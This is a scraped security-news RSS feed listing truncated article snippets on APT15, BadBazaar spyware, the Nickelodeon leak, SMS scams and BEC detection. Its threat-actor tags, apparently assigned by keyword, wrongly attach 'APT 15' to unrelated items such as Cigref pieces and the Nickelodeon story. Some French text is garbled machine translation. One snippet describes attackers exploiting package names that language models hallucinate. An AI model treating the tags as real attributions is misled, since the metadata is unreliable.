This is the RSS 2.0 feed from www.secnews.physaphae.fr. IT's a simple agragated flow of multiple articles soruces. Liste of sources, can be found on www.secnews.physaphae.fr. 2024-05-13T19:47:05+00:00 www.secnews.physaphae.fr Silicon - Site de News Francais 2023-10-24T08:07:41+00:00 https://www.silicon.fr/cloud-confiance-vision-environnementale-cigref-472634.html www.secnews.physaphae.fr/article.php?IdArticle=8399611 False Cloud APT 15 2.0000000000000000 Silicon - Site de News Francais 2023-10-20T10:19:43+00:00 https://www.silicon.fr/metiers-it-scrum-master-fonction-formation-et-salaire-472576.html www.secnews.physaphae.fr/article.php?IdArticle=8398212 False None APT 15 2.0000000000000000 knowbe4 - cybersecurity services Resesecurity avertit que l'acteur de la triade de smirage a «largement élargi son empreinte d'attaque» aux Émirats arabes unis (EAU).

---

Resecurity warns that the Smishing Triad threat actor has “vastly expanded its attack footprint” in the United Arab Emirates (UAE).]]> 2023-10-10T20:05:50+00:00 https://blog.knowbe4.com/smishing-triad-sets-its-sights-on-uae www.secnews.physaphae.fr/article.php?IdArticle=8393944 False Threat APT 15 3.0000000000000000 Data Security Breach - Site de news Francais Continue reading Un groupe d'espionnage aligné avec les intérêts chinois usurpant Signal et Telegram]]> 2023-09-01T13:43:32+00:00 https://www.datasecuritybreach.fr/apt-gref/ www.secnews.physaphae.fr/article.php?IdArticle=8377844 False Tool APT 15 3.0000000000000000 Global Security Mag - Site de news francais Malwares]]> 2023-08-31T09:18:59+00:00 https://www.globalsecuritymag.fr/ESET-decouvre-un-groupe-d-espionnage-aligne-avec-les-interets-chinois-usurpant.html www.secnews.physaphae.fr/article.php?IdArticle=8377106 False Malware APT 15 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Cybersecurity researchers have discovered malicious Android apps for Signal and Telegram distributed via the Google Play Store and Samsung Galaxy Store that are engineered to deliver the BadBazaar spyware on infected devices. Slovakian company ESET attributed the campaign to a China-linked actor called GREF. "Most likely active since July 2020 and since July 2022, respectively, the campaigns]]> 2023-08-30T19:13:00+00:00 https://thehackernews.com/2023/08/china-linked-badbazaar-android-spyware.html www.secnews.physaphae.fr/article.php?IdArticle=8376758 False None APT 15,APT 15 2.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine ESET said BadBazaar was available via the Google Play Store, Samsung Galaxy Store and various app sites]]> 2023-08-30T16:00:00+00:00 https://www.infosecurity-magazine.com/news/chinese-gref-target-badbazaar/ www.secnews.physaphae.fr/article.php?IdArticle=8376774 False None APT 15,APT 15 3.0000000000000000 Bleeping Computer - Magazine Américain Trojanized Signal and Telegram apps containing the BadBazaar spyware were uploaded onto Google Play and Samsung Galaxy Store by a Chinese APT hacking group known as GREF. [...]]]> 2023-08-30T11:16:48+00:00 https://www.bleepingcomputer.com/news/security/trojanized-signal-and-telegram-apps-on-google-play-delivered-spyware/ www.secnews.physaphae.fr/article.php?IdArticle=8376772 False None APT 15 3.0000000000000000 We Live Security - Editeur Logiciel Antivirus ESET ESET researchers have discovered active campaigns linked to the China-aligned APT group known as GREF, distributing espionage code that has previously targeted Uyghurs]]> 2023-08-30T09:30:18+00:00 https://www.welivesecurity.com/en/eset-research/badbazaar-espionage-tool-targets-android-users-trojanized-signal-telegram-apps/ www.secnews.physaphae.fr/article.php?IdArticle=8382224 False Tool APT 15 2.0000000000000000 AhnLab - Korean Security Firm Tendances du groupe APT & # 8211;Juin 2023 1) Andariel 2) APT28 3) Cadet Blizzard (Dev-0586) 4) Camaro Dragon 5) Chicheau charmant (Mint Sandstorm) 6) Gamaredon (Shuckworm) 7) Ke3Chang (Apt15, Nickel) 8) Kimsuky 9) Lazarus 10) Eau boueuse 11) Mustang Panda 12) Oceanlotus 13) Patchwork (éléphant blanc) 14) REd Eyes (APT37) 15) Sharp Panda 16) Sidecopy 17) Soldat Stealth ATIP_2023_JUN_THREAT Rapport de tendance sur les groupes APT

---

APT Group Trends – June 2023  1) Andariel 2) APT28 3) Cadet Blizzard (DEV-0586) 4) Camaro Dragon 5) Charming Kitten (Mint Sandstorm) 6) Gamaredon (Shuckworm) 7) Ke3chang (APT15, Nickel) 8) Kimsuky 9) Lazarus 10) Muddy Water 11) Mustang Panda 12) OceanLotus 13) Patchwork (White Elephant) 14) Red Eyes (APT37) 15) Sharp Panda 16) SideCopy 17) Stealth Soldier ATIP_2023_Jun_Threat Trend Report on APT Groups ]]> 2023-08-16T06:46:45+00:00 https://asec.ahnlab.com/en/56195/ www.secnews.physaphae.fr/article.php?IdArticle=8370575 False Threat,Prediction APT 38,APT 35,APT 35,APT 25,APT 32,APT 32,APT 37,APT 37,APT 15,APT 15,APT 28,APT 28 2.0000000000000000 AlienVault Lab Blog - AlienVault est un acteur de defense majeur dans les IOC AI-hallucinations: Artificial intelligence (AI) hallucinations, as described [2], refer to confident responses generated by AI systems that lack justification based on their training data. Similar to human psychological hallucinations, AI hallucinations involve the AI system providing information or responses that are not supported by the available data. However, in the context of AI, hallucinations are associated with unjustified responses or beliefs rather than false percepts. This phenomenon gained attention around 2022 with the introduction of large language models like ChatGPT, where users observed instances of seemingly random but plausible-sounding falsehoods being generated. By 2023, it was acknowledged that frequent hallucinations in AI systems posed a significant challenge for the field of language models. The exploitative process: Cybercriminals begin by deliberately publishing malicious packages under commonly hallucinated names produced by large language machines (LLMs) such as ChatGPT within trusted repositories. These package names closely resemble legitimate and widely used libraries or utilities, such as the legitimate package ‘arangojs’ vs the hallucinated package ‘arangodb’ as shown in the research done by Vulcan [1]. The trap unfolds: When developers, unaware of the malicious intent, utilize AI-based tools or large language models (LLMs) to generate code snippets for their projects, they inadvertently can fall into a trap. The AI-generated code snippets can include imaginary unpublished libraries, enabling cybercriminals to publish commonly used AI-generated imaginary package names. As a result, developers unknowingly import malicious packages into their projects, introducing vulnerabilities, backdoors, or other malicious functionalities that compromise the security and integrity of the software and possibly other projects. Implications for developers: The exploitation of AI-generated hallucinated package names poses significant risks to developers and their projects. Here are some key implications: Trusting familiar package names: Developers commonly rely on package names they recognize to introduce code snippets into their projects. The presence of malicious packages under commonly hallucinated names makes it increasingly difficult to distinguish between legitimate and malicious options when relying on the trust from AI generated code. Blind trust in AI-generated code: Many develo]]> 2023-08-02T10:00:00+00:00 https://cybersecurity.att.com/blogs/security-essentials/code-mirage-how-cyber-criminals-harness-ai-hallucinated-code-for-malicious-machinations www.secnews.physaphae.fr/article.php?IdArticle=8364676 False Tool ChatGPT,ChatGPT,APT 15 3.0000000000000000 Silicon - Site de News Francais 2023-07-19T16:09:41+00:00 https://www.silicon.fr/ia-generative-cigref-470181.html www.secnews.physaphae.fr/article.php?IdArticle=8358883 False None APT 15 3.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine Social media reports suggest an individual allegedly dumped approximately 500GB of animation files]]> 2023-07-07T16:00:00+00:00 https://www.infosecurity-magazine.com/news/twitter-user-exposes-nickelodeon/ www.secnews.physaphae.fr/article.php?IdArticle=8353400 False None APT 15 2.0000000000000000 The Register - Site journalistique Anglais TV network\'s attorneys \'on a DMCA rampage\' ... are you sure you\'re ready, kids? Nickelodeon says it is probing claims that "decades old" material was stolen from it and leaked online. This follows reports on social media that someone had dumped 500GB of snatched animation files. Hilarity, and many SpongeBob SquarePants memes, ensued.…]]> 2023-07-06T22:45:12+00:00 https://go.theregister.com/feed/www.theregister.com/2023/07/06/nickelodeon_confirms_data_leak/ www.secnews.physaphae.fr/article.php?IdArticle=8353174 False None APT 15 2.0000000000000000 Recorded Future - FLux Recorded Future Le géant de la télévision des enfants, Nickelodeon, a déclaré qu'il enquêtait sur une violation présumée après que les pirates aient prétendu avoir volé 500 Go de données.Pendant des jours, les experts en cybersécurité ont averti que pirates partagent des documents volés du réseau qui comprenait des fuites du département d'animation Nickellodeon.Certaines des informations auraient remonté des décennies.[Captures d'écran du

---

Children\'s television giant Nickelodeon said it is investigating an alleged breach after hackers claimed to have stolen 500 GB of data. For days, cybersecurity experts have warned that hackers are sharing stolen documents from the network that included leaks from the Nickelodeon animation department. Some of the information allegedly dates back decades. [Screenshots of the]]> 2023-07-06T19:11:00+00:00 https://therecord.media/nickelodeon-alleged-data-breach www.secnews.physaphae.fr/article.php?IdArticle=8353124 False None APT 15 2.0000000000000000 Bleeping Computer - Magazine Américain Nickelodeon has confirmed that the data leaked from an alleged breach of the company is legitimate but it appears to be decades old. [...]]]> 2023-07-06T11:03:36+00:00 https://www.bleepingcomputer.com/news/security/nickelodeon-investigates-breach-after-leak-of-decades-old-data/ www.secnews.physaphae.fr/article.php?IdArticle=8352923 False None APT 15 2.0000000000000000 knowbe4 - cybersecurity services CyberheistNews Vol 13 #26  |   June 27th, 2023 [Eyes Open] The FTC Reveals the Latest Top Five Text Message Scams The U.S. Federal Trade Commission (FTC) has published a data spotlight outlining the most common text message scams. Phony bank fraud prevention alerts were the most common type of text scam last year. "Reports about texts impersonating banks are up nearly tenfold since 2019 with median reported individual losses of $3,000 last year," the report says. These are the top five text scams reported by the FTC: Copycat bank fraud prevention alerts Bogus "gifts" that can cost you Fake package delivery problems Phony job offers Not-really-from-Amazon security alerts "People get a text supposedly from a bank asking them to call a number ASAP about suspicious activity or to reply YES or NO to verify whether a transaction was authorized. If they reply, they\'ll get a call from a phony \'fraud department\' claiming they want to \'help get your money back.\' What they really want to do is make unauthorized transfers. "What\'s more, they may ask for personal information like Social Security numbers, setting people up for possible identity theft." Fake gift card offers took second place, followed by phony package delivery problems. "Scammers understand how our shopping habits have changed and have updated their sleazy tactics accordingly," the FTC says. "People may get a text pretending to be from the U.S. Postal Service, FedEx, or UPS claiming there\'s a problem with a delivery. "The text links to a convincing-looking – but utterly bogus – website that asks for a credit card number to cover a small \'redelivery fee.\'" Scammers also target job seekers with bogus job offers in an attempt to steal their money and personal information. "With workplaces in transition, some scammers are using texts to perpetrate old-school forms of fraud – for example, fake \'mystery shopper\' jobs or bogus money-making offers for driving around with cars wrapped in ads," the report says. "Other texts target people who post their resumes on employment websites. They claim to offer jobs and even send job seekers checks, usually with instructions to send some of the money to a different address for materials, training, or the like. By the time the check bounces, the person\'s money – and the phony \'employer\' – are long gone." Finally, scammers impersonate Amazon and send fake security alerts to trick victims into sending money. "People may get what looks like a message from \'Amazon,\' asking to verify a big-ticket order they didn\'t place," the FTC says. "Concerned ]]> 2023-06-27T13:00:00+00:00 https://blog.knowbe4.com/cyberheistnews-vol-13-26-eyes-open-the-ftc-reveals-the-latest-top-five-text-message-scams www.secnews.physaphae.fr/article.php?IdArticle=8349704 False Ransomware,Spam,Malware,Hack,Tool,Threat ChatGPT,ChatGPT,APT 15,APT 28,FedEx 2.0000000000000000 SlashNext - Cyber Firm Un nouvel avertissement de Verizon de la montée en puissance des smirs, des messages texte et des escroqueries par texte et du FBI signalent 10,3 milliards de dollars de fraude sur Internet l'année dernière, les CISO sont de plus en plus préoccupés par les menaces mobiles ciblant les employés et l'impact sur leur organisation.La montée en puissance du smirage, des messages texte de spam et des escroqueries par texte.Dans une enquête récente [& # 8230;] Le post CISOS de plus en plus préoccupé par les menaces mobiles : //slashnext.com "> slashnext .

---

>A new warning from Verizon about the rise of smishing, spam text messages and text scams and the FBI reporting $10.3 billion in internet fraud last year, CISOs are increasingly concerned about mobile threats targeting employees and the impact to their organization.  The rise of smishing, spam text messages and text scams.  In recent survey […] The post CISOs Increasingly Concerned About Mobile Threats first appeared on SlashNext.]]> 2023-06-23T21:30:46+00:00 https://slashnext.com/blog/cisos-increasingly-concerned-about-mobile-threats/ www.secnews.physaphae.fr/article.php?IdArticle=8386745 False Spam APT 15 2.0000000000000000 Dark Reading - Informationweek Branch The notorious APT15 used common malware tools and a third-generation custom "Graphican" backdoor to continue its information gathering exploits, this time against foreign ministries.]]> 2023-06-21T21:35:00+00:00 https://www.darkreading.com/vulnerabilities-threats/20-year-old-chinese-apt15-new-life-foreign-ministry-attacks www.secnews.physaphae.fr/article.php?IdArticle=8347850 False Malware APT 15,APT 15 2.0000000000000000 Recorded Future - FLux Recorded Future Le groupe de cyber-espionnage chinois connu sous le nom de nickel ou APT15 a utilisé une porte dérobée auparavant invisible pour attaquer mercredi des ministères des affaires étrangères en Amérique centrale et du Sud.Dans la campagne qui s'est déroulée de la fin de 2022 au début de 2023, les pirates ont ciblé un département des finances du gouvernement et une société anonyme ainsi que les affaires étrangères

---

The Chinese cyber-espionage group known as Nickel or APT15 used a previously unseen backdoor to attack ministries of foreign affairs in Central and South America, researchers reported Wednesday. In the campaign that ran from late 2022 into early 2023, hackers targeted a government finance department and an unnamed corporation as well as the foreign affairs]]> 2023-06-21T17:13:00+00:00 https://therecord.media/apt15-nickel-graphican-backdoor www.secnews.physaphae.fr/article.php?IdArticle=8347784 False None APT 15,APT 15 2.0000000000000000 Bleeping Computer - Magazine Américain The Chinese state-sponsored hacking group tracked as APT15 has been observed using a novel backdoor named \'Graphican\' in a new campaign between late 2022 and early 2023. [...]]]> 2023-06-21T06:00:00+00:00 https://www.bleepingcomputer.com/news/security/chinese-apt15-hackers-resurface-with-new-graphican-malware/ www.secnews.physaphae.fr/article.php?IdArticle=8347642 False Malware APT 15,APT 15 3.0000000000000000 Silicon - Site de News Francais 2023-06-20T08:37:46+00:00 https://www.silicon.fr/cigref-performance-dsi-468130.html www.secnews.physaphae.fr/article.php?IdArticle=8347228 False None APT 15 3.0000000000000000 Silicon - Site de News Francais 2023-05-29T09:42:08+00:00 https://www.silicon.fr/cigref-scoring-rse-projets-it-466305.html www.secnews.physaphae.fr/article.php?IdArticle=8340178 False None APT 15 3.0000000000000000 DDoSecrets - Blog Sécu: Distributed Email of Secrets Emails from the Indonesian conglomerate involved in nickel, coal, and bauxite mining, ferronickel smelters, alumina refineries, logging, and palm oil plantations.]]> 2023-05-17T07:28:14+00:00 https://ddosecrets.substack.com/p/release-harita-group-510-gb www.secnews.physaphae.fr/article.php?IdArticle=8337280 False None APT 15 2.0000000000000000 GoogleSec - Firm Security Blog Google announced its next step toward a passwordless future: passkeys. Passkeys are a new, passwordless authentication method that offer a convenient authentication experience for sites and apps, using just a fingerprint, face scan or other screen lock. They are designed to enhance online security for users. Because they are based on the public key cryptographic protocols that underpin security keys, they are resistant to phishing and other online attacks, making them more secure than SMS, app based one-time passwords and other forms of multi-factor authentication (MFA). And since passkeys are standardized, a single implementation enables a passwordless experience across browsers and operating systems. Passkeys can be used in two different ways: on the same device or from a different device. For example, if you need to sign in to a website on an Android device and you have a passkey stored on that same device, then using it only involves unlocking the phone. On the other hand, if you need to sign in to that website on the Chrome browser on your computer, you simply scan a QR code to connect the phone and computer to use the passkey.The technology behind the former (“same device passkey”) is not new: it was originally developed within the FIDO Alliance and first implemented by Google in August 2019 in select flows. Google and other FIDO members have been working together on enhancing the underlying technology of passkeys over the last few years to improve their usability and convenience. This technology behind passkeys allows users to log in to their account using any form of device-based user verification, such as biometrics or a PIN code. A credential is only registered once on a user\'s personal device, and then the device proves possession of the registered credential to the remote server by asking the user to use their device\'s screen lock. The user\'s biometric, or other screen lock data, is never sent to Google\'s servers - it stays securely stored on the device, and only cryptographic proof that the user has correctly provided it is sent to Google. Passkeys are also created and stored on your devices and are not sent to websites or apps. If you create a passkey on one device the Google Password Manager can make it available on your other devices that are signed into the same system account.Learn more on how passkey works under the hoo]]> 2023-05-05T12:00:43+00:00 http://security.googleblog.com/2023/05/making-authentication-faster-than-ever.html www.secnews.physaphae.fr/article.php?IdArticle=8333804 False None APT 38,APT 10,APT 15,Guam 2.0000000000000000 RedCanary - Red Canary Microsoft has awarded Red Canary\'s Director of Intelligence Operations its Security Changemaker award at its 2023 Security Excellence Awards.]]> 2023-04-26T16:11:23+00:00 https://redcanary.com/blog/katie-nickels-microsoft-security-award/ www.secnews.physaphae.fr/article.php?IdArticle=8331282 False None APT 15 2.0000000000000000 Recorded Future - FLux Recorded Future Le comté de Suffolk de New York a conclu une enquête sur une attaque de ransomware déstabilisatrice qui a forcé les travailleurs du gouvernement à s'appuyer sur des télécopies et des archives papier, découvrant des déficiences marquantes dans les pratiques de cybersécurité du greffier du comté.Steven Bellone du comté de Suffolk [a tenu une conférence de presse] (https://www.facebook.com/stevebellone/videos/550329996987344/) mercredi pour dévoiler les résultats de l'enquête médico-légale sur le septembre

---

New York\'s Suffolk County has concluded an investigation into a destabilizing ransomware attack that forced government workers to rely on fax machines and paper records, discovering stark deficiencies in the county clerk\'s cybersecurity practices. Suffolk County Executive Steven Bellone [held a press conference](https://www.facebook.com/SteveBellone/videos/550329996987344/) Wednesday to unveil the findings of the forensic investigation into the September]]> 2023-04-12T23:37:00+00:00 https://therecord.media/suffolk-county-new-york-ransomware-investigation www.secnews.physaphae.fr/article.php?IdArticle=8327274 False Ransomware APT 15 2.0000000000000000 Silicon - Site de News Francais 2023-02-22T16:34:23+00:00 https://www.silicon.fr/gestion-crise-cyber-approche-cigref-7-chiffres-458946.html www.secnews.physaphae.fr/article.php?IdArticle=8312524 False None APT 15 3.0000000000000000 Silicon - Site de News Francais 2023-02-20T16:33:54+00:00 https://www.silicon.fr/metiers-it-technologie-femmes-458752.html www.secnews.physaphae.fr/article.php?IdArticle=8311921 False None APT 15 2.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine 2023-02-17T17:00:00+00:00 https://www.infosecurity-magazine.com/news/eu-warns-chinese-apts/ www.secnews.physaphae.fr/article.php?IdArticle=8311285 False None APT 25,APT 31,APT 15,APT 27,APT 30 2.0000000000000000 Global Security Mag - Site de news francais Formations des Instituts privés et public]]> 2023-02-17T08:29:11+00:00 https://www.globalsecuritymag.fr/Fortinet-enrichit-son-offre-de-services-et-de-formations-pour-aider-les-equipes.html www.secnews.physaphae.fr/article.php?IdArticle=8311183 False None APT 15 2.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Roaming Mantis Implements New DNS Changer in Its Malicious Mobile App in 2022 (published: January 19, 2023) In December 2022, a financially-motivated group dubbed Roaming Mantis (Shaoye) continued targeting mobile users with malicious landing pages. iOS users were redirected to phishing pages, while Android users were provided with malicious APK files detected as XLoader (Wroba, Moqhao). Japan, Austria, France, and Germany were the most targeted for XLoader downloads (in that order). All but one targeted country had smishing as an initial vector. In South Korea, Roaming Mantis implemented a new DNS changer function. XLoader-infected Android devices were targeting specific Wi-Fi routers used mostly in South Korea. The malware would compromise routers with default credentials and change the DNS settings to serve malicious landing pages from legitimate domains. Analyst Comment: The XLoader DNS changer function is especially dangerous in the context of free/public Wi-Fi that serve many devices. Install anti-virus software for your mobile device. Users should be cautious when receiving messages with a link or unwarranted prompts to install software. MITRE ATT&CK: [MITRE ATT&CK] T1078.001 - Valid Accounts: Default Accounts | [MITRE ATT&CK] T1584 - Compromise Infrastructure Tags: actor:Roaming Mantis, actor:Shaoye, file-type:APK, detection:Wroba, detection:Moqhao, detection:XLoader, malware-type:Trojan-Dropper, DNS changer, Wi-Fi routers, ipTIME, EFM Networks, Title router, DNS hijacking, Malicious app, Smishing, South Korea, target-country:KR, Japan, target-country:JP, Austria, target-country:AT, France, target-country:FR, Germany, target-country:DE, VK, Mobile, Android Hook: a New Ermac Fork with RAT Capabilities (published: January 19, 2023) ThreatFabric researchers analyzed a new Android banking trojan named Hook. It is a rebranded development of the Ermac malware that was based on the Android banker Cerberus. Hook added new capabilities in targeting banking and cryptocurrency-related applications. The malware also added capabilities of a remote access trojan and a spyware. Its device take-over capabilities include being able to remotely view and interact with the screen of the infected device, manipulate files on the devices file system, simulate clicks, fill text boxes, and perform gestures. Hook can start the social messaging application WhatsApp, extract all the messages present, and send new ones. Analyst Comment: Users should take their mobile device security seriously whether they use it for social messaging or actually provide access to their banking accounts and/or cryptocurrency holdings. Similar to its predecessors, Hook will likely be used by many threat actors (malware-as-as-service model). It means the need to protect from a wide range of attacks: smishing, prompts to install malicious apps, excessive]]> 2023-01-24T16:30:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-roaming-mantis-changes-dns-on-wi-fi-routers-hook-android-banking-trojan-has-device-take-over-capabilities-ke3chang-targeted-iran-with-updated-turian-backdoor www.secnews.physaphae.fr/article.php?IdArticle=8303740 False Malware,Tool,Threat,Guideline APT 25,APT 15 3.0000000000000000 CSO - CSO Daily Dashboard Palo Alto Networks report. The Chinese threat actor also known as APT15, KeChang, NICKEL, BackdoorDiplomacy, and Vixen Panda, was observed attempting to connect government domains to malware infrastructure previously associated with the APT group, according to the report.“Playful Taurus continues to evolve their tactics and their tooling. Recent upgrades to the Turian backdoor and new C2 infrastructure suggest that these actors continue to see success during their cyber espionage campaigns,” Palo Alto Networks said in a blog. To read this article in full, please click here]]> 2023-01-19T04:27:00+00:00 https://www.csoonline.com/article/3686088/chinese-hackers-targeted-iranian-government-entities-for-months-report.html#tk.rss_all www.secnews.physaphae.fr/article.php?IdArticle=8302529 False Malware,Threat APT 25,APT 15 3.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine 2023-01-18T18:00:00+00:00 https://www.infosecurity-magazine.com/news/chinese-apt-group-vixen-panda/ www.secnews.physaphae.fr/article.php?IdArticle=8302416 False None APT 25,APT 15 3.0000000000000000 Silicon - Site de News Francais 2023-01-09T10:58:20+00:00 https://www.silicon.fr/low-code-enedis-pierre-fabre-stime-temoignent-455846.html www.secnews.physaphae.fr/article.php?IdArticle=8299144 False None APT 15 2.0000000000000000 Silicon - Site de News Francais 2023-01-09T09:34:59+00:00 https://www.silicon.fr/low-code-cigref-question-couts-455839.html www.secnews.physaphae.fr/article.php?IdArticle=8299130 False None APT 15 2.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine 2022-12-09T16:00:00+00:00 https://www.infosecurity-magazine.com/news/iranian-hacker-uses-github-to/ www.secnews.physaphae.fr/article.php?IdArticle=8289582 False Malware APT 15 3.0000000000000000 Global Security Mag - Site de news francais Malwares]]> 2022-12-09T11:17:25+00:00 https://www.globalsecuritymag.fr/Un-groupe-soutenu-par-l-Iran-utilise-Github-pour-relayer-les-instructions-de.html www.secnews.physaphae.fr/article.php?IdArticle=8289522 False Malware APT 15 2.0000000000000000 SecureWork - SecureWork: incident response 2022-12-09T04:00:00+00:00 https://www.secureworks.com/blog/drokbk-malware-uses-github-as-dead-drop-resolver www.secnews.physaphae.fr/article.php?IdArticle=8289504 False Malware,Threat APT 15 2.0000000000000000 Silicon - Site de News Francais 2022-12-08T15:27:58+00:00 https://www.silicon.fr/machine-learning-tensorflow-google-sheets-454628.html www.secnews.physaphae.fr/article.php?IdArticle=8289147 False None APT 15 2.0000000000000000 CVE Liste - Common Vulnerability Exposure 2022-12-07T20:15:11+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-46770 www.secnews.physaphae.fr/article.php?IdArticle=8288886 False None APT 15 None Silicon - Site de News Francais 2022-11-29T08:46:30+00:00 https://www.silicon.fr/rse-positionnement-dsi-453513.html www.secnews.physaphae.fr/article.php?IdArticle=8277891 False General Information APT 15 3.0000000000000000 Silicon - Site de News Francais 2022-11-07T08:46:21+00:00 https://www.silicon.fr/crise-energetique-pistes-cigref-directions-numeriques-451957.html www.secnews.physaphae.fr/article.php?IdArticle=7879100 False None APT 15 None Silicon - Site de News Francais 2022-10-18T15:36:10+00:00 https://www.silicon.fr/low-code-metavers-projections-cigref-450377.html www.secnews.physaphae.fr/article.php?IdArticle=7542509 False None APT 15 None CISCO Talos - Cisco Research blog By Abhishek Singh.BEC is a multi-stage attack. Adversaries first identify targets, then they establish rapport with the victim before exploiting them for whatever their end goal is. In the case of BEC, a threat actor can impersonate any employee in the organization to trick targets.  A policy that checks for authorized email addresses of the sender can prevent BEC attacks. However, scaling the approach for every employee in a large organization is a challenge.  Building an executive profile based on email analysis using a machine learning model and scanning emails against that profile will detect BEC. Data collection for building and training machine learning algorithms can take time, though, opening a window of opportunity for threat actors to exploit.  Detection of exploitation techniques such as lookalike domains and any differences in the email addresses in the "From" and "Reply-to" fields can also detect BEC messages. However, the final verdict cannot account for the threat actor's intent.  The intent-based approach detects BEC and then classifies it into the type of scam. It catches BEC messages, irrespective of whether a threat actor is impersonating a C-level executive or any employee in an organization. Classification based on the type of scam can help identify which segment of an organization was targeted and which employees were being impersonated by the threat actor. The additional information will further assist in better designing preventive features to stop BEC. Business email compromise (BEC) is one of the most financially damaging online crimes. As per the internet crime 221 report, the total loss in 2021 due to BEC is around 2.4 billion dollars. Since 2013, BEC has resulted in a 43 billion dollars loss. The report defines BEC as a scam targeting businesses (not individuals) working with foreign suppliers and companies regularly performing wire transfer payments. Fraudsters carry out these sophisticated scams to conduct the unauthorized transfer of funds. This introduces the challenge of how to detect and block these campaigns as they continue to compromise organizations successfully. There are a variety of approaches to identifying BEC email messages, such as using policy to allow emails from authorized email addresses, detecting exploitation techniques used by threat actors, building profiles by analysis of emails, and validating against the profile to detect BEC. These approaches have a variety of limitations or shortcomings. Cisco Talos is taking a different approach and using an intent-based model to identify and block BEC messages. Before we get too deep into the intent-based model, take a deeper look at the commonly used approaches to block BEC from the simplistic through machine learning (ML) approaches. Policy-based detection The first place to start is with policy-based detection as it is one of the most common and simplistic approaches to blocking BEC campaigns. Let's start by looking at an example of a BEC email. ]]> 2022-10-18T08:41:18+00:00 http://blog.talosintelligence.com/2022/10/the-benefits-of-taking-intent-based.html www.secnews.physaphae.fr/article.php?IdArticle=7540074 False Threat,Medical,Cloud APT 38,APT 19,APT 29,APT 10,APT 37,Uber,APT 15,Yahoo None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Hacker Pwns Uber Via Compromised VPN Account (published: September 16, 2022) On September 15, 2022, ride-sharing giant Uber started an incident response after discovering a data breach. According to Group-IB researchers, download file name artifacts point to the attacker getting access to fresh keylogger logs affecting two Uber employees from Indonesia and Brazil that have been infected with Racoon and Vidar stealers. The attacker allegedly used a compromised VPN account credentials and performed multifactor authentication fatigue attack by requesting the MFA push notification many times and then making a social-engineering call to the affected employee. Once inside, the attacker allegedly found valid credentials for privilege escalation: a PowerShell script containing hardcoded credentials for a Thycotic privileged access management admin account. On September 18, 2022, Rockstar Games’ Grand Theft Auto 6 suffered a confirmed data leak, likely caused by the same attacker. Analyst Comment: Network defenders can consider setting up alerts for signs of an MFA fatigue attack such as a large number of MFA requests in a relatively short period of time. Review your source code for embedded credentials, especially those with administrative privileges. MITRE ATT&CK: [MITRE ATT&CK] Valid Accounts - T1078 | [MITRE ATT&CK] Credentials from Password Stores - T1555 Tags: MFA fatigue, Social engineering, Data breach, Uber, GTA 6, GTA VI, detection:Racoon, detection:Vidar, malware-type:Keylogger, malware-type:Stealer Self-Spreading Stealer Attacks Gamers via YouTube (published: September 15, 2022) Kaspersky researchers discovered a new campaign spreading the RedLine commodity stealer. This campaign utilizes a malicious bundle: a single self-extracting archive. The bundle delivers RedLine and additional malware, which enables spreading the malicious archive by publishing promotional videos on victim’s Youtube channel. These videos target gamers with promises of “cheats” and “cracks.” Analyst Comment: Kids and other online gamers should be reminded to avoid illegal software. It might be better to use different machines for your gaming and banking activities. MITRE ATT&CK: [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Credentials from Password Stores - T1555 | [MITRE ATT&CK] Resource Hijacking - T1496 Tags: detection:RedLine, malware-type:Stealer, Bundle, Self-spreading, Telegraph, Youtub]]> 2022-09-20T15:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-uber-and-gta-6-were-breached-redline-bundle-file-advertises-itself-on-youtube-supply-chain-attack-via-ecommerce-fishpig-extensions-and-more www.secnews.physaphae.fr/article.php?IdArticle=7016803 False Ransomware,Malware,Tool,Vulnerability,Threat,Guideline Uber,Uber,APT 15,APT 41 None Global Security Mag - Site de news francais RGPD / cybersecurite_home_gauche]]> 2022-09-13T09:53:05+00:00 http://www.globalsecuritymag.fr/Sanction-de-250-000-euros-a-l,20220913,129744.html www.secnews.physaphae.fr/article.php?IdArticle=6867504 False None APT 15 None Silicon - Site de News Francais 2022-09-06T13:39:03+00:00 https://www.silicon.fr/cigref-evoluer-metiers-si-446406.html www.secnews.physaphae.fr/article.php?IdArticle=6750215 False None APT 15 None NoticeBored - Experienced IT Security professional glossy, nicely-constructed and detailed PowerPoint slide deck by Microsoft Security caught my beady this morning. The title 'CISO Workshop: Security Program and Strategy' with 'Your Name Here' suggests it might be a template for use in a workshop/course bringing CISOs up to speed on the governance, strategic and architectural aspects of information security, but in fact given the amount of technical detail, it appears to be aimed at informing IT/technology managers about IT or cybersecurity, specifically. Maybe it is intended for newly-appointed CISOs or more junior managers who aspire to be CISOs, helping them clamber up the pyramid (slide 87 of 142):]]> 2022-08-06T10:46:21+00:00 http://blog.noticebored.com/2022/08/a-glossy-nicely-constructed-and.html www.secnews.physaphae.fr/article.php?IdArticle=6150878 False Malware,Vulnerability,Threat,Patching,Guideline,Medical,Cloud APT 38,APT 19,APT 10,APT 37,Uber,APT 15,Guam,APT 28,APT 34 None 01net. Actualites - Securite - Magazine Francais Des centaines de trolls basés à Saint-Pétersbourg généraient des commentaires pro-russes en série sur les réseaux sociaux. Mais au final, l'opération était d'un niveau médiocre et peu efficace. L'article Meta a chassé de Facebook et d’Instagram des centaines de trolls russes payés pour manipuler l’opinion est à retrouver sur 01net.com.]]> 2022-08-05T11:34:14+00:00 https://www.01net.com/actualites/meta-a-chasse-des-centaines-de-trolls-russes-aux-pieds-nickeles.html www.secnews.physaphae.fr/article.php?IdArticle=6141252 False None APT 15 None Silicon - Site de News Francais 2022-06-28T11:03:27+00:00 https://www.silicon.fr/cloud-proteger-europe-loi-extraterritoriale-442355.html www.secnews.physaphae.fr/article.php?IdArticle=5486504 False None APT 15 None Silicon - Site de News Francais 